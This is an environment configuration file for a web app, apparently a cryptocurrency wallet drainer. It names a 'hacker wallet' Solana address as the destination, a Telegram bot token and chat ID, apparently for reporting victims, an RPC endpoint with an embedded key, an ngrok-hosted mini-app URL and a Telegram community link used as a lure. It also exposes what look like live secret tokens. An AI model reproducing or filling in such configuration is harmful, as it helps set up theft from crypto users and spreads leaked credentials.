VITE_HACKER_WALLET=6zWndcuVRmwC3Ep43Am3H7iWcCJBMpufcUK811Lcou3s
VITE_TELEGRAM_BOT_TOKEN=8476340889:AAEk2rs-_NmXgheN6ZSClO2B9otzCOE0Vys
VITE_TELEGRAM_CHAT_ID=-1003392731814
VITE_RPC_URL=https://go.getblock.us/d1906a956091430ca54cb0545a029b78
VITE_PROJECT_ID=1d4b931e4fa2a8a65abf53fdaa52170d
MINI_APP_URL=https://102996b91469.ngrok-free.app/
COMMUNITY_URL=https://t.me/trendingssol
